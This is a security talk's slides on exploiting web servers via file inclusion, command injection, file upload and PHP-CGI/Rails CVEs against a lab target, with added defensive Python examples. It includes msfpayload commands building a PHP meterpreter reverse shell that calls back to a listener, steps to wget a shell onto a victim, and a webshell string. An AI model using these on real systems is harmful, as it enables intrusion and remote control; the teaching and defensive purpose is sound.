
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.


1 Dennis Maldonado @DennisMald

2
• Application Security Specialist
  ▪ WhiteHat Security
• Full-Time Student
  ▪ University of Houston – Main Campus
  ▪ Computer Information Systems Major
• Twitter: @DennisMald
• Website / Blog: KernelMeltdown.org

3
• Kali Linux – our attacker machine
• Metasploit Framework – used for exploiting the target, generating the payload and establishing a session with the victim
• Metasploitable 2 – the victim web server

4 Exploiting the backend server through a web application.

5
• Reasons why hackers want to compromise the server:
  ▪ Run attacks against the internal network
  ▪ Use the server as a bot
  ▪ Install backdoors on the server
  ▪ Reveal sensitive files/passwords
  ▪ Execute any local file
  ▪ Execute remote files
  ▪ and more…

6
• Vulnerabilities that are dangerous to a server:
  ▪ Directory Traversal
  ▪ Local File Inclusion
  ▪ Remote File Inclusion
  ▪ Remote Code Execution
  ▪ SQL Injection
  ▪ Command Injection

7 http://website.com/?page=index.php
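The `?page=` parameter above is the classic directory traversal / local and remote file inclusion entry point from slide 6. The following is an added example, not code from the slides or from DVWA: `resolve_unsafe` mirrors a PHP `include($_GET['page'])`, `classify` triages a parameter value the way a log reviewer or WAF rule would, and `resolve_safe` shows the whitelist-plus-canonical-path check that stops all three attack shapes. `WEB_ROOT` and `ALLOWED_PAGES` are assumptions for the example.

```python
import os
from urllib.parse import urlparse

# Assumed layout for the example (not taken from the slides): the vulnerable
# script lives in WEB_ROOT and a "?page=" parameter names the file to include.
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {"index.php", "about.php", "contact.php"}  # hypothetical whitelist


def resolve_unsafe(page: str) -> str:
    """Equivalent of include($_GET['page']): the client controls the path outright.

    '../../../../etc/passwd' (traversal / LFI), '/etc/passwd' and
    'http://attacker/shell.txt' (RFI, when allow_url_include is on) all pass through.
    """
    return page


def classify(page: str) -> str:
    """Rough triage of a ?page= value as seen in access logs or by a WAF."""
    if urlparse(page).scheme:            # http://, ftp://, php://, data://, ...
        return "remote-or-wrapper"
    norm = os.path.normpath(page)
    if os.path.isabs(norm) or norm.startswith(".."):
        return "traversal"
    return "local"


def resolve_safe(page: str) -> str:
    """Whitelist the page name, then prove the canonical path stays under WEB_ROOT."""
    if page not in ALLOWED_PAGES:
        raise ValueError("refused %r (%s)" % (page, classify(page)))
    full = os.path.normpath(os.path.join(WEB_ROOT, page))
    # Defence in depth: even a whitelisted name must canonicalise inside the root.
    if os.path.commonpath([WEB_ROOT, full]) != WEB_ROOT:
        raise ValueError("refused %r: escapes web root" % page)
    return full


def accepted(page: str) -> bool:
    """True if resolve_safe() would include the page, False if it refuses it."""
    try:
        resolve_safe(page)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for probe in ("index.php", "../../../../etc/passwd", "/etc/passwd",
                  "http://attacker.example/shell.txt",
                  "php://filter/convert.base64-encode/resource=index.php"):
        print("%-60s %-18s accepted=%s" % (probe, classify(probe), accepted(probe)))
```

Whitelisting the page name is what actually closes the hole; the `commonpath` check only guards against a future mistake in the whitelist. Blacklisting `../` is not enough, because `php://filter`, `data://` and absolute paths contain no dot-dot at all.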



10 http://website.com/

11 http://website.com/user.php?id=1&Submit=Submit#



14
• Metasploit is an open-source framework for developing and testing security tooling:
  ▪ Information gathering and fingerprinting
  ▪ Exploitation / penetration testing
  ▪ Payload generation and encoding
  ▪ Fuzzing
  ▪ And much more…

15
• Command-line interfaces
  ▪ msfconsole
  ▪ msfcli
• GUI interfaces
  ▪ Metasploit Community Edition
  ▪ Armitage

16 Modules
• Exploit – exploitation / proof-of-concept code
  ▪ Ruby on Rails exploit
  ▪ PHP-CGI exploit
• Auxiliary – miscellaneous modules for multiple purposes
  ▪ Scanners
  ▪ DoS tools
  ▪ Fingerprinting
  ▪ Clients
• Payloads – code to be executed on the exploited system
  ▪ System shells
  ▪ Meterpreter shells
• Post – modules for post-exploitation tasks
  ▪ Persistence
  ▪ Password stealing
  ▪ Pivoting

17
• Active exploits
  ▪ Actively exploit a host
  ▪ Ex: Ruby on Rails XML exploit
• Passive exploits
  ▪ Wait for incoming hosts, then exploit them (e.g. a malicious web server that attacks the browsers connecting to it)
  ▪ Ex: Java 0-days
• Exploits carry payloads

18
• Inline (non-staged)
  ▪ Single-stage payload: all of the shellcode is delivered together with the exploit
  ▪ Stable
  ▪ Large size
• Staged
  ▪ The exploit delivers a small stager, which connects to the attacker and pulls down the rest of the payload
• Meterpreter
  ▪ Advanced, dynamic payload
  ▪ Staged and extended over the network
  ▪ Extensible through modules and plugins

19 Types of connections
• Bind
  ▪ A listener is started on the victim machine
  ▪ The attacker connects to the victim
  ▪ windows/x64/shell/bind_tcp
• Reverse
  ▪ A listener is started on the attacker machine
  ▪ The victim connects back to the attacker (this usually gets through egress firewalls and NAT that would block a bind payload)
  ▪ windows/x64/shell/reverse_tcp
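To make the difference between the two connection types concrete, here is an added example that is not Metasploit's `shell/bind_tcp` or `shell/reverse_tcp` code: a toy agent that runs one argv-style command received over TCP, wired up both ways on the loopback interface. The only thing that changes between `bind_tcp` and `reverse_tcp` is which side calls `listen()`/`accept()` and which side calls `connect()`; port numbers are assigned by the OS for the example.

```python
import socket
import subprocess
import threading

# Added example, not Metasploit payload code. The "agent" is the victim side, the
# "handler" is the attacker side (multi/handler in Metasploit terms). Both run in
# one process here, on 127.0.0.1, so the exchange can be observed end to end.


def agent(conn: socket.socket) -> None:
    """Victim side: read one line, execute it without a shell, return its stdout."""
    f = conn.makefile("rb")
    line = f.readline().decode().strip()
    f.close()
    if line:
        out = subprocess.run(line.split(), capture_output=True, text=True).stdout
        conn.sendall(out.encode())
    conn.close()


def handler(conn: socket.socket, command: str) -> str:
    """Attacker side: send a command and read the reply until the agent hangs up."""
    conn.sendall((command + "\n").encode())
    chunks = []
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            break
        chunks.append(chunk)
    conn.close()
    return b"".join(chunks).decode()


def _listener() -> socket.socket:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    s.listen(1)
    return s


def bind_tcp(command: str) -> str:
    """bind_tcp: the VICTIM listens; the attacker's handler connects to it."""
    victim_listener = _listener()
    port = victim_listener.getsockname()[1]

    def victim():
        conn, _ = victim_listener.accept()
        victim_listener.close()
        agent(conn)

    t = threading.Thread(target=victim)
    t.start()
    out = handler(socket.create_connection(("127.0.0.1", port)), command)
    t.join()
    return out


def reverse_tcp(command: str) -> str:
    """reverse_tcp: the ATTACKER listens (multi/handler); the victim connects back."""
    attacker_listener = _listener()
    port = attacker_listener.getsockname()[1]

    def victim():
        agent(socket.create_connection(("127.0.0.1", port)))

    t = threading.Thread(target=victim)
    t.start()
    conn, _ = attacker_listener.accept()
    attacker_listener.close()
    out = handler(conn, command)
    t.join()
    return out


if __name__ == "__main__":
    print("bind_tcp    ->", bind_tcp("echo hello from bind").strip())
    print("reverse_tcp ->", reverse_tcp("echo hello from reverse").strip())
```

On a real engagement the victim's inbound port for a bind payload is rarely reachable, which is why the reverse form (and the `multi/handler` listener on slide 25) is the default choice.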


21 CVE-2012-1823 (PHP-CGI argument injection)
• A query string that contains no "=" is handed to php-cgi as command-line arguments
• DoS attack
  ▪ -T 10000 (benchmark loop: run the script 10000 times per request)
• Source code disclosure
  ▪ -s argument (print the script's source instead of running it)
• Remote code execution
  ▪ -d argument (override php.ini settings, e.g. auto_prepend_file=php://input)
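The detection side of this, as an added example that is not from the slides or the advisory: the CGI specification says a query string without an unencoded "=" is split on "+", percent-decoded and passed to the program as argv; php-cgi forgot to discard those arguments. The function below reproduces that rule and runs it over a few constructed Apache-style access-log lines (hosts, timestamps and sizes are invented) to flag the `-s`, `-d` and `-T` abuses the slide lists.

```python
import re
from urllib.parse import unquote

# Constructed access log lines for the example (hosts, times and sizes invented).
# The last three requests carry php-cgi arguments in the query string.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.5 - - [10/May/2012:10:00:02 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 640
10.0.0.9 - - [10/May/2012:10:00:03 +0000] "GET /index.php?-s HTTP/1.1" 200 2048
10.0.0.9 - - [10/May/2012:10:00:04 +0000] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 77
10.0.0.9 - - [10/May/2012:10:00:05 +0000] "GET /index.php?-T+10000 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# php-cgi options the slide calls out, and what an attacker gains from each.
DANGEROUS_OPTIONS = {
    "-s": "source disclosure",
    "-d": "ini override -> remote code execution",
    "-T": "benchmark loop -> denial of service",
}


def cgi_argv(query: str) -> list:
    """Arguments php-cgi would receive for this query string.

    A query string WITHOUT an unencoded '=' is split on '+', percent-decoded and
    handed to the program as argv. An encoded '=' ('%3d') survives that check,
    which is how '-d allow_url_include=1' is smuggled through.
    """
    if "=" in query:
        return []
    return [unquote(tok) for tok in query.split("+") if tok]


def analyse_request(target: str):
    """Return (option, description) if the target abuses php-cgi arguments, else None."""
    path, _, query = target.partition("?")
    lower = path.lower()
    if not lower.endswith(".php") and "/php" not in lower:
        return None
    for arg in cgi_argv(query):
        if arg[:2] in DANGEROUS_OPTIONS:
            return arg[:2], DANGEROUS_OPTIONS[arg[:2]]
    return None


def scan_log(log: str) -> list:
    """Return (ip, target, option, description) for every suspicious request line."""
    hits = []
    for line in log.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        verdict = analyse_request(m.group("target"))
        if verdict:
            hits.append((m.group("ip"), m.group("target")) + verdict)
    return hits


if __name__ == "__main__":
    for ip, target, opt, why in scan_log(SAMPLE_LOG):
        print("%s  %s  %s (%s)" % (ip, opt, why, target))
```

Note that the `-d` request is a POST: the prepended `php://input` wrapper makes PHP execute the request body, so the body, not the URL, carries the actual code, and a URL-only rule would still catch it.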

22 CVE-2013-0156 (Ruby on Rails parameter parsing)
• Easy to find, easy to exploit, critical vulnerability
• Requires just one POST request containing specially crafted XML data
• An XML node declared type="yaml" is deserialised with YAML.load, so the request can instantiate arbitrary Ruby objects and run commands

23 File upload
• The upload functionality allows any file type to be uploaded
1. Upload server-side code and check whether it executes
  ▪ PHP =
  ▪ ASP =
  ▪ JSP =
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Upload the shell and execute it

24 Command injection
• Allows an attacker to execute system-level commands
1. Attempt a safe command first
  1. echo test
  2. uname -a
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Inject a curl or wget command to download the shell onto the victim machine
5. chmod it if necessary and execute it

25
• Show the payload's options (O):
  msfpayload php/meterpreter/reverse_tcp O
  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O
• Write the raw payload (R) to a file:
  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php
  # Now edit shell.php: remove the comment marker on the first line so the file starts with <?php, and add "?>" at the end of the file.
==================================
• Start the handler (E = execute) and wait for the uploaded shell to connect back:
  msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
(msfpayload and msfcli were later retired from the framework; msfvenom and "msfconsole -x" cover the same steps.)
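The probe in step 1 of slide 24 works because the application builds a shell command line from the parameter. Here is an added example, not from the slides or from DVWA, of a "ping this host" feature written two ways: `ping_unsafe` is the equivalent of PHP's `shell_exec("ping -c 1 " . $_GET['ip'])`, and `ping_safe` is the library-call form from slide 27 with a whitelist pattern in front. `HOSTNAME_RE` is an assumption about what the feature should accept (DNS names and IPv4 literals), and `accepts_injection` is the "attempt a safe command" check automated.

```python
import re
import subprocess

# Added example, not from the slides. HOSTNAME_RE is an assumption: only names
# made of letters, digits, dots and dashes, starting with a letter or digit, so
# shell metacharacters AND a leading '-' (ping option injection) are both refused.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def ping_unsafe(host: str) -> str:
    """Vulnerable: equivalent of shell_exec("ping -c 1 " . $_GET['ip']).

    The string reaches /bin/sh, so ';', '|', '&&', backticks and $(...) in the
    parameter become additional commands. That is what "127.0.0.1; echo test"
    and later "127.0.0.1; wget http://attacker/shell.php" rely on.
    """
    result = subprocess.run("ping -c 1 -W 1 " + host, shell=True,
                            capture_output=True, text=True, timeout=10)
    return result.stdout


def ping_safe(host: str) -> str:
    """Fixed: validate against the whitelist pattern, then pass argv with no shell."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("rejected host %r" % host)
    # A list argv is passed straight to execve(); there is no shell to interpret it.
    result = subprocess.run(["ping", "-c", "1", "-W", "1", host],
                            capture_output=True, text=True, timeout=10)
    return result.stdout


def accepts_injection(func, probe: str = "127.0.0.1; echo INJECTED") -> bool:
    """Slide 24's 'attempt a safe command' check: does the marker come back?"""
    try:
        return "INJECTED" in func(probe)
    except ValueError:
        return False


if __name__ == "__main__":
    print("ping_unsafe injectable:", accepts_injection(ping_unsafe))
    print("ping_safe injectable:  ", accepts_injection(ping_safe))
```

The injected `echo` runs even when `ping` itself fails, because the shell executes the commands one after another; that is also why the marker-based probe is a reliable first test before trying `uname -a` or a download.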


27 Mitigations
• Keep software up to date!
  ▪ PHP: 5.4.3 / 5.3.13 (fix for CVE-2012-1823)
  ▪ Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15 (fix for CVE-2013-0156)
• Use a whitelist of allowed file-upload extensions
  ▪ Check both the extension and the content type
  ▪ Don't let the upload directory be executable
  ▪ Rename uploaded files if possible
• Don't pass user input to a system command!
  ▪ Use library calls when possible
  ▪ Validate and sanitize input
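The upload advice above, as an added example that is not the slides' code: a validator that applies an extension whitelist, checks the Content-Type and the file's leading bytes, and then renames the file to a random token, plus a writer that stores it without the execute bit. The allowed set is an assumption for a site that only accepts images; `demo()` runs the checks against constructed inputs, including the `shell.php` and `shell.php.png` uploads slide 23 would try.

```python
import os
import secrets
import tempfile

# Added example, not from the slides. Extension whitelist with the MIME type and
# leading bytes ("magic") each one must carry; an assumption for an images-only site.
ALLOWED = {
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif":  ("image/gif",  b"GIF8"),
}


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return the name the file will be stored under, or raise ValueError.

    Whitelisted extension, matching Content-Type, matching magic bytes; then the
    file is renamed to a random token so 'shell.php.png' never keeps its name.
    """
    base = os.path.basename(filename.replace("\\", "/"))   # drop any ../ path part
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED:
        raise ValueError("extension not allowed: %r" % base)
    mime, magic = ALLOWED[ext]
    if content_type.split(";")[0].strip().lower() != mime:
        raise ValueError("content-type %r does not match .%s" % (content_type, ext))
    if not data.startswith(magic):
        raise ValueError("content does not look like a .%s" % ext)
    # A polyglot (valid image header with PHP appended) still passes the checks
    # above; the random name and a non-executable directory are what stop it.
    return secrets.token_hex(16) + "." + ext


def store_upload(upload_dir: str, stored_name: str, data: bytes) -> str:
    """Write with O_EXCL (no clobbering) and a mode that has no execute bit."""
    path = os.path.join(upload_dir, stored_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def accepted(filename: str, content_type: str, data: bytes) -> bool:
    try:
        validate_upload(filename, content_type, data)
        return True
    except ValueError:
        return False


def demo() -> dict:
    """Run the checks on constructed uploads and report what each produced."""
    png = ALLOWED["png"][1] + b"\x00" * 16          # constructed PNG prefix
    webshell = b"<?php system($_GET['cmd']); ?>"   # the kind of file slide 23 uploads
    name = validate_upload("../../photo.PNG", "image/png", png)
    path = store_upload(tempfile.mkdtemp(), name, png)
    return {
        "photo_stored_as": name,
        "executable_bit": bool(os.stat(path).st_mode & 0o111),
        "shell.php": accepted("shell.php", "application/x-php", webshell),
        "shell.php.png (no magic)": accepted("shell.php.png", "image/png", webshell),
        "polyglot": accepted("shell.php.png", "image/png", png + webshell),
        "renamed polyglot keeps php in name":
            "php" in validate_upload("shell.php.png", "image/png", png + webshell),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-36s %s" % (k, v))
```

The polyglot case is the one to remember: content checks alone accept it, so the server-side configuration (no script handler for the upload directory) and the rename are not optional extras but the controls that actually hold.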


29 References
• BackTrack Linux / Kali Linux
  http://www.kali.org/
• The Metasploit Project
  http://www.metasploit.com/
• Metasploit Unleashed
  http://www.offensive-security.com/metasploit-unleashed/
• PHP-CGI Advisory
  http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
• Ruby on Rails Exploitation
  https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
• Damn Vulnerable Web Application (DVWA)
  http://www.dvwa.co.uk/
• Metasploitable 2
  http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web

